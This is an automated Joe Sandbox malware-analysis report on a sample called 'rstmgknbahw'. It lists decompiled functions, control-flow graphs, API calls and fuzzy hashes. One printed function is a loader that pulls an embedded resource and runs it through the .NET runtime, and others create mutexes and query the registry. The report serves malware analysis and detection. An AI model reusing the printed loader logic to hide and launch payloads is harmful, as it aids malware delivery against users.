                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 10ea633e641ee860454ad3e6cd2b182dc0000dc9f0f85000cfa5ba9670cb8f0e
                          • Instruction ID: 50aae82b394a6444db5554a8ce1b5f43ef0a7763f21dd179e1fb952bb9d45459
                          • Opcode Fuzzy Hash: 10ea633e641ee860454ad3e6cd2b182dc0000dc9f0f85000cfa5ba9670cb8f0e
                          • Instruction Fuzzy Hash: C2516B32F015169BD715DB69C884B6EB7E3AFC8311F2AC174E409AB369DE34EC418B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00401489() {
                          				void* _v8;
                          				struct HRSRC__* _t4;
                          				long _t10;
                          				struct HRSRC__* _t12;
                          				void* _t16;
                          
                          				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                          				_t12 = _t4;
                          				if(_t12 == 0) {
                          					L6:
                          					ExitProcess(0);
                          				}
                          				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                          				if(_t16 != 0) {
                          					_v8 = LockResource(_t16);
                          					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                          					_t13 = _v8;
                          					if(_v8 != 0 && _t10 != 0) {
                          						L00401000(_t13, _t10); // executed
                          					}
                          				}
                          				FreeResource(_t16);
                          				goto L6;
                          			}








                          0x0040149f
                          0x004014a5
                          0x004014a9
                          0x004014ec
                          0x004014ee
                          0x004014ee
                          0x004014b7
                          0x004014bb
                          0x004014c7
                          0x004014cd
                          0x004014d3
                          0x004014d8
                          0x004014e0
                          0x004014e0
                          0x004014d8
                          0x004014e6
                          0x00000000

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                          • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                          • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                          • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                          • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                            • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                          • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                          • ExitProcess.KERNEL32 ref: 004014EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                          • String ID: v2.0.50727
                          • API String ID: 2372384083-2350909873
                          • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                          • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                          • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                          • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004055C5(void* __ecx) {
                          				void* _t6;
                          				void* _t14;
                          				void* _t18;
                          				WCHAR* _t19;
                          
                          				_t14 = __ecx;
                          				_t19 = GetEnvironmentStringsW();
                          				if(_t19 != 0) {
                          					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                          					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                          					_t18 = _t6;
                          					if(_t18 != 0) {
                          						E0040ACF0(_t18, _t19, _t12);
                          					}
                          					E00403E03(0);
                          					FreeEnvironmentStringsW(_t19);
                          				} else {
                          					_t18 = 0;
                          				}
                          				return _t18;
                          			}







                          0x004055c5
                          0x004055cf
                          0x004055d3
                          0x004055e4
                          0x004055e8
                          0x004055ed
                          0x004055f3
                          0x004055f8
                          0x004055fd
                          0x00405602
                          0x00405609
                          0x004055d5
                          0x004055d5
                          0x004055d5
                          0x00405614

                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free
                          • String ID:
                          • API String ID: 3328510275-0
                          • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                          • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                          • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                          • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 22 49e0682-49e068d 23 49e068f-49e07c8 22->23 24 49e0638-49e0644 22->24 96 49e0797 call 49e0918 23->96 97 49e0797 call 49e0908 23->97 98 49e0797 call 49e09a5 23->98 25 49e0649-49e064b 24->25 26 49e0646-49e064b 24->26 27 49e0625-49e063f 25->27 26->27 62 49e079d-49e079f 63 49e07ca 62->63 64 49e07a1 62->64 91 49e07ca call ab0638 63->91 92 49e07ca call ab05d2 63->92 93 49e07ca call ab05f6 63->93 64->63 65 49e07d0 94 49e07d0 call 49e4190 65->94 95 49e07d0 call 49e4180 65->95 66 49e07d6-49e081a 78 49e081c 66->78 79 49e0827-49e0846 66->79 78->79 84 49e0848-49e084e 79->84 85 49e0854-49e0869 79->85 84->85 91->65 92->65 93->65 94->66 95->66 96->62 97->62 98->62
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: Zvq^$Yvq^
                          • API String ID: 0-307087882
                          • Opcode ID: fdaf9d5734eb7663d64538bdb3f2d064d695a9519e235469a785db198818b25b
                          • Instruction ID: 3d93dc74643759b41bd763eb2431ae62981e45ea5e310b152a8878b5c3f2fe89
                          • Opcode Fuzzy Hash: fdaf9d5734eb7663d64538bdb3f2d064d695a9519e235469a785db198818b25b
                          • Instruction Fuzzy Hash: F751C131328251CFC715ABB5EC1C2BD3BA7BFC0751B14897AE402CA2B5DE759C029BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 99 49e2d58-49e2d8a 103 49e2d8c 99->103 104 49e2d91 99->104 105 49e2e9d-49e2ea4 103->105 137 49e2d91 call 49e2d58 104->137 138 49e2d91 call 49e2d48 104->138 139 49e2d91 call 49e2ec0 104->139 106 49e2d97-49e2d99 107 49e2d9b 106->107 108 49e2da0-49e2e13 106->108 107->105 112 49e2dbf-49e2dc9 108->112 113 49e2ea7-49e2ec2 108->113 112->113 114 49e2dcf-49e2dd9 112->114 119 49e2ec9-49e2ecb 113->119 114->113 116 49e2ddf-49e2de9 114->116 116->113 117 49e2def-49e2e22 116->117 129 49e2e76-49e2e7a 117->129 121 49e2ecd-49e2ed0 119->121 122 49e2ed1-49e2ed7 119->122 130 49e2e7c 129->130 131 49e2e24-49e2e39 129->131 133 49e2e7e-49e2e80 130->133 131->113 132 49e2e3b-49e2e67 131->132 132->113 135 49e2e69-49e2e73 132->135 133->113 134 49e2e82-49e2e8c 133->134 134->133 136 49e2e8e-49e2e9a 134->136 135->129 136->105 137->106 138->106 139->106
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: $>_kq
                          • API String ID: 0-1412446344
                          • Opcode ID: 1e0130cf3be974ee7bf6a8d95cd096172e7365b35f984e95a3b0b35d1878df52
                          • Instruction ID: 85aa665a6c3f787c250e84a43133531dda992c6e738b410b5d1befbaf8160b52
                          • Opcode Fuzzy Hash: 1e0130cf3be974ee7bf6a8d95cd096172e7365b35f984e95a3b0b35d1878df52
                          • Instruction Fuzzy Hash: 6841F870F08165CBCB11CF6AC8885BEBB6BEBC4214B24C9BEC416DB645E635F8438751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 140 49e3b6b-49e3b7c 142 49e3b7e-49e3b90 140->142 143 49e3bc7-49e3bd2 140->143 146 49e3b97-49e3bdf 142->146 143->142 151 49e3d16-49e3d1c 146->151 152 49e3d22-49e3d29 151->152 153 49e3be1-49e3bf1 151->153 154 49e3d2a-49e3d3d 153->154 155 49e3bf7-49e3c01 153->155 160 49e3d3f-49e3d51 154->160 161 49e3ce8-49e3d12 154->161 156 49e3c0f-49e3c20 155->156 157 49e3c03-49e3c05 155->157 156->154 159 49e3c26-49e3c30 156->159 157->156 162 49e3c3e-49e3c4e 159->162 163 49e3c32-49e3c34 159->163 164 49e3d5d-49e3d8f 160->164 165 49e3d53-49e3d55 160->165 161->151 162->154 166 49e3c54-49e3c5a 162->166 163->162 174 49e3f6d-49e3f85 164->174 175 49e3d95-49e3d9e 164->175 165->164 167 49e3c5c-49e3c62 166->167 168 49e3c74-49e3c80 166->168 172 49e3c66-49e3c72 167->172 173 49e3c64 167->173 168->154 170 49e3c86-49e3ce6 168->170 170->161 172->168 173->168 187 49e3f87-49e3fb9 174->187 188 49e3f30-49e3f57 174->188 178 49e3da4-49e3dad 175->178 179 49e3e71-49e3e75 175->179 178->174 181 49e3db3-49e3dbc 178->181 182 49e3e9b-49e3ea4 179->182 183 49e3e77-49e3e83 179->183 189 49e3e4d-49e3e56 181->189 190 49e3dc2-49e3dce 181->190 184 49e3ebc-49e3ec2 182->184 185 49e3ea6-49e3eb9 182->185 183->174 191 49e3e89-49e3e99 183->191 192 49e3ec5-49e3ece 184->192 185->184 215 49e3fcf-49e3ff0 187->215 216 49e3fbb 187->216 188->174 218 49e3f59-49e3f60 188->218 189->174 194 49e3e5c-49e3e6b 189->194 190->174 195 49e3dd4-49e3dff 190->195 191->192 192->174 197 49e3ed4-49e3ee6 192->197 194->178 194->179 195->189 203 49e3e01-49e3e08 195->203 197->174 200 49e3eec-49e3efc 197->200 200->174 204 49e3efe-49e3f0e 200->204 208 49e3e0a 203->208 209 49e3e14-49e3e1d 203->209 204->174 210 49e3f10-49e3f2a 204->210 208->209 209->174 211 49e3e23-49e3e48 209->211 210->174 212 49e3f2c-49e3f2f 210->212 222 49e3f63-49e3f6a 211->222 212->188 217 49e3fbe-49e3fc0 216->217 220 49e3fc2-49e3fcd 217->220 221 49e3ff1-49e402c 217->221 218->222 220->215 220->217 229 49e402e 221->229 230 49e4033-49e403a 221->230 231 49e40c1-49e40c8 229->231 233 49e403c 230->233 234 49e4043-49e408f call 49e23a0 230->234 233->234 234->231
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: >_kq
                          • API String ID: 0-4149988037
                          • Opcode ID: fc3eef119669e7df8793534295e97aa73a1fa6d559ee5ef12740d9a3e6c82179
                          • Instruction ID: 80f5d641a18f6d4ae1cefccda19228cb407024303488d2f3c985e6b157e8f55b
                          • Opcode Fuzzy Hash: fc3eef119669e7df8793534295e97aa73a1fa6d559ee5ef12740d9a3e6c82179
                          • Instruction Fuzzy Hash: 9DF18271A00205CFCB16CF59C8849A9FBF6FF89310719CAA5E8099F266D730EC46CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 244 4c70508-4c70512 245 4c70514 244->245 246 4c7049f-4c704a9 244->246 249 4c70516-4c7052c 245->249 250 4c7052e-4c70576 245->250 247 4c704ab-4c704b3 CreateMutexW 246->247 248 4c704fa-4c704ff 246->248 252 4c704b9-4c704cf 247->252 248->247 249->250 254 4c705a3-4c705a8 250->254 255 4c70578-4c7058b 250->255 256 4c70501-4c70506 252->256 257 4c704d1-4c704f7 252->257 254->255 262 4c7058d-4c705a0 255->262 263 4c705aa-4c705af 255->263 256->257 263->262
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: fa4af51b462f23658906262028c66f77828e3989861d30d0d177d6e87cd21828
                          • Instruction ID: 39185def0bbf2fc84c5d8ea2d7aea1817d9dcc9a19ba610fd4264c1de5d5b0aa
                          • Opcode Fuzzy Hash: fa4af51b462f23658906262028c66f77828e3989861d30d0d177d6e87cd21828
                          • Instruction Fuzzy Hash: 9B31C2764057809FE751CF15D885B62BFE4FF06324F0880AADD848F263D375A909CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 265 a8aa7e-a8ab09 269 a8ab0b 265->269 270 a8ab0e-a8ab25 265->270 269->270 272 a8ab67-a8ab6c 270->272 273 a8ab27-a8ab3a RegOpenKeyExW 270->273 272->273 274 a8ab3c-a8ab64 273->274 275 a8ab6e-a8ab73 273->275 275->274
                          APIs
                          • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AB2D
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 886e13b95dd9be686bc9409f1f169c791d1ffd276477b9b18c3ec3037bf8b1dc
                          • Instruction ID: fae96809c9eb10a5f98341ee3e0c042d26038d0fe75b804a7762622720a20607
                          • Opcode Fuzzy Hash: 886e13b95dd9be686bc9409f1f169c791d1ffd276477b9b18c3ec3037bf8b1dc
                          • Instruction Fuzzy Hash: C031C2B25443846FE7228B25CC45FA7BFA8EF05720F0884AAED858B152D224E909CB71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 a8ab75-a8abf3 283 a8abf8-a8ac01 280->283 284 a8abf5 280->284 285 a8ac03 283->285 286 a8ac06-a8ac0c 283->286 284->283 285->286 287 a8ac0e 286->287 288 a8ac11-a8ac28 286->288 287->288 290 a8ac2a-a8ac3d RegQueryValueExW 288->290 291 a8ac5f-a8ac64 288->291 292 a8ac3f-a8ac5c 290->292 293 a8ac66-a8ac6b 290->293 291->290 293->292
                          APIs
                          • RegQueryValueExW.KERNELBASE(?,00000E80,427A8738,00000000,00000000,00000000,00000000), ref: 00A8AC30
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: QueryValue
                          • String ID:
                          • API String ID: 3660427363-0
                          • Opcode ID: 6a04c560e63e687e55e3ceba14855ddb3e3081806a053760d1c3c441b2f8e58a
                          • Instruction ID: b8ab514c0e2ac2f4fd3ee12f610d8eda7cc699d1dc6ad46f1af7056078190124
                          • Opcode Fuzzy Hash: 6a04c560e63e687e55e3ceba14855ddb3e3081806a053760d1c3c441b2f8e58a
                          • Instruction Fuzzy Hash: 3A31A4B15097845FE722CF65CC84F52BFF8EF06310F08859AE985CB153D264E949CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 309 4c70416-4c7048d 313 4c70492-4c7049b 309->313 314 4c7048f 309->314 315 4c704a0-4c704a9 313->315 316 4c7049d 313->316 314->313 317 4c704ab-4c704cf CreateMutexW 315->317 318 4c704fa-4c704ff 315->318 316->315 321 4c70501-4c70506 317->321 322 4c704d1-4c704f7 317->322 318->317 321->322
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: 0a05a4d5b556717658638602debe4c94dba1ea35aed1af45de40ff19d648fcf5
                          • Instruction ID: e27a8874a6977477200d0185606a3f088f0924d123c8c37e748d1c50dfe5798a
                          • Opcode Fuzzy Hash: 0a05a4d5b556717658638602debe4c94dba1ea35aed1af45de40ff19d648fcf5
                          • Instruction Fuzzy Hash: CC3173B15097806FE722CF65CC85F56FFE8EF05310F0884AAE9859B292D375E904C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 297 a8b51b-a8b596 299 a8b598 297->299 300 a8b59b-a8b5a1 297->300 299->300 301 a8b5a3 300->301 302 a8b5a6-a8b5b2 300->302 301->302 303 a8b5e8-a8b5ed 302->303 304 a8b5b4-a8b5c7 GetClassInfoW 302->304 303->304 305 a8b5c9-a8b5e5 304->305 306 a8b5ef-a8b5f4 304->306 306->305
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ClassInfo
                          • String ID:
                          • API String ID: 3534257612-0
                          • Opcode ID: 46e54ec5ac475c58570c75008ec059c5e8a313874240229bdd4403bfa802781e
                          • Instruction ID: b4ce2786de1300f9e51228eeaa358885af9c1c4311be32f56951c09eccfab674
                          • Opcode Fuzzy Hash: 46e54ec5ac475c58570c75008ec059c5e8a313874240229bdd4403bfa802781e
                          • Instruction Fuzzy Hash: 4431597650E3C05FE7138B25DC50A52BFB4AF07210B0E80DBD885CF1A3D2299909C772
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 325 a8b080-a8b0a0 326 a8b0a2 325->326 327 a8b0a3 325->327 326->327 328 a8b0a4-a8b0c7 326->328 327->328 329 a8b0ca-a8b122 SetConsoleCtrlHandler 328->329 331 a8b128-a8b13e 329->331
                          APIs
                          • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A8B11A
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ConsoleCtrlHandler
                          • String ID:
                          • API String ID: 1513847179-0
                          • Opcode ID: 256a167d91259c36ed349bfd0c411101ee368eec03d2d6b6601810c4bfd31e2a
                          • Instruction ID: e998c83fd7aba24bea4104ef5bdd10c3aebdaf08d1b74b94a75f11710ef87252
                          • Opcode Fuzzy Hash: 256a167d91259c36ed349bfd0c411101ee368eec03d2d6b6601810c4bfd31e2a
                          • Instruction Fuzzy Hash: A221A37140D3C16FD3138B258C51B22BFB4EF87620F0A40DBE984CB5A3D229A919C772
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 332 a8aaae-a8ab09 335 a8ab0b 332->335 336 a8ab0e-a8ab25 332->336 335->336 338 a8ab67-a8ab6c 336->338 339 a8ab27-a8ab3a RegOpenKeyExW 336->339 338->339 340 a8ab3c-a8ab64 339->340 341 a8ab6e-a8ab73 339->341 341->340
                          APIs
                          • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AB2D
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: b6e8bc2f99c9da76896bdd8d125dca01ba62f32d8a245c01bbca96b6db223868
                          • Instruction ID: 717435175df2626bf72bbce613a05e5fa79074066ce8daa3a08b8172b26c8f75
                          • Opcode Fuzzy Hash: b6e8bc2f99c9da76896bdd8d125dca01ba62f32d8a245c01bbca96b6db223868
                          • Instruction Fuzzy Hash: 84219FB2500704AEE7219F55CC88F6AFBEDEF14720F04845AE9459A641D634E948CB72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 4c7043e-4c7048d 349 4c70492-4c7049b 346->349 350 4c7048f 346->350 351 4c704a0-4c704a9 349->351 352 4c7049d 349->352 350->349 353 4c704ab-4c704cf CreateMutexW 351->353 354 4c704fa-4c704ff 351->354 352->351 357 4c70501-4c70506 353->357 358 4c704d1-4c704f7 353->358 354->353 357->358
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: da4f4c06cf2128c3613dea3ba54a947d66a5b40ca17623483a48d8a3aea607a2
                          • Instruction ID: 41c4a15fc02f002846f8cb4b39a7c5e0783f89df2c81a7fde3d202b73c5d3f50
                          • Opcode Fuzzy Hash: da4f4c06cf2128c3613dea3ba54a947d66a5b40ca17623483a48d8a3aea607a2
                          • Instruction Fuzzy Hash: 02217CB1644340AFE721CF6ACC85B66FBE8EF04320F08846AE9459B242E775E504CB75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 361 a8abb6-a8abf3 363 a8abf8-a8ac01 361->363 364 a8abf5 361->364 365 a8ac03 363->365 366 a8ac06-a8ac0c 363->366 364->363 365->366 367 a8ac0e 366->367 368 a8ac11-a8ac28 366->368 367->368 370 a8ac2a-a8ac3d RegQueryValueExW 368->370 371 a8ac5f-a8ac64 368->371 372 a8ac3f-a8ac5c 370->372 373 a8ac66-a8ac6b 370->373 371->370 373->372
                          APIs
                          • RegQueryValueExW.KERNELBASE(?,00000E80,427A8738,00000000,00000000,00000000,00000000), ref: 00A8AC30
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: QueryValue
                          • String ID:
                          • API String ID: 3660427363-0
                          • Opcode ID: aa9ff16f9cd95e4223fb0fd1f5ed79f8c0f5d33ac8317de92ad6c4fa340d104d
                          • Instruction ID: afc22ac322dad96112cd005a61f132379c2f5231a3bcd2638ed45322cffc3969
                          • Opcode Fuzzy Hash: aa9ff16f9cd95e4223fb0fd1f5ed79f8c0f5d33ac8317de92ad6c4fa340d104d
                          • Instruction Fuzzy Hash: B0218EB1600704AFE721DF55CC84F66BBE8EF14720F08856AE945CB252E764E848CB72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 00A8BC01
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 7ab977c0174aa161647ffb160d4dddfc3c3085b27c9c5e6590bcf447fb01fc78
                          • Instruction ID: 2891a218f6dbbdfbb2f3099138d1ab08cd25f0f68cdaa595a1b73e5fbc4ecfd9
                          • Opcode Fuzzy Hash: 7ab977c0174aa161647ffb160d4dddfc3c3085b27c9c5e6590bcf447fb01fc78
                          • Instruction Fuzzy Hash: 042190754097C09FDB228B21DC50A62BFB0EF17324F0D84DAEDC44F163D265A958D762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 377 a8a59b-a8a5fe 379 a8a638-a8a63d 377->379 380 a8a600-a8a608 DuplicateHandle 377->380 379->380 381 a8a60e-a8a620 380->381 383 a8a63f-a8a644 381->383 384 a8a622-a8a635 381->384 383->384
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A606
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 15d35df462b8bcd4ce82bf1a1eed04d0bca8ebdc0f8cce81650fef744b69cc25
                          • Instruction ID: 4e6478234f7b8cb528a49dcb4d08a10d222143cde83945204e18152fe13f7d8d
                          • Opcode Fuzzy Hash: 15d35df462b8bcd4ce82bf1a1eed04d0bca8ebdc0f8cce81650fef744b69cc25
                          • Instruction Fuzzy Hash: 5811A271409380AFDB228F55DC44A62FFF4EF56310F08849AED858F152D275A419DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 00A8BF79
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 68324ed7f7dad972245864ff75cf8b7350f6defdab30b7b620040266df2212f3
                          • Instruction ID: 058b0dbff37f4b2334cb1fbd39256f0a2950d18d277c2f48bff3b62f80b4e0b5
                          • Opcode Fuzzy Hash: 68324ed7f7dad972245864ff75cf8b7350f6defdab30b7b620040266df2212f3
                          • Instruction Fuzzy Hash: C311AC35409380AFDB228B25CC85A52FFB4EF16220F0885DEED858B562D265A818CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DispatchMessageW.USER32(?), ref: 04C70270
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DispatchMessage
                          • String ID:
                          • API String ID: 2061451462-0
                          • Opcode ID: 226c139a46e35272870505cad42f76da566971c6cb16c96ff7331ce875912ece
                          • Instruction ID: de1aa65aea8e0f3ce4cbf42a651a9642f8d1bce0849c28a9eeda20b834e30b2c
                          • Opcode Fuzzy Hash: 226c139a46e35272870505cad42f76da566971c6cb16c96ff7331ce875912ece
                          • Instruction Fuzzy Hash: 32117C7540D3C0AFD7128B259C84B61BFB4EF47624F0980DAED848F263D269A908CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateIconFromResourceEx.USER32 ref: 00A8BB4A
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateFromIconResource
                          • String ID:
                          • API String ID: 3668623891-0
